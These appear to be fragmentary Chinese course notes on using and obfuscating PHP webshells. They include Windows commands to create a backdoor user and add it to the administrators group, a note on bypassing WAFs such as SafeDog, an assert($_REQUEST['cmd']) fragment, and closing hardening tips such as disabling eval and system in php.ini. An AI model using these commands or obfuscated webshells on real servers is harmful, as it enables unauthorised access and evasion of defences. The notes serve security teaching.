第四章 课时四 WebShell使用与变形下

是需要下载加载器，不要直接下载工具，不然还要下载环境

出现在菜刀之后，蚁剑之前

可以读一读 中国菜刀流量分析老一些的文章
net user
net user ichunqiu
net user ichunqiu 123456
netstat -an ｜ find “3389”
net user you helloword /add
net localgroup administrators you /add

WebShell 变形

关键词：php 过狗 一句话 变形

上述相当于\(a变成了assert(\)_REQUEST["cmd"]);
waf也叫web防火墙







上述示例有使用匿名函数，个别地方没有写全

安全狗，D盾，netstat -an
可以在php.ini文件中的disable_functions 加上eval，system之类的函数
也可以apache禁止访问文件或目录执行权限、禁止运行脚本php文件，其他中间件应该也有类似的设置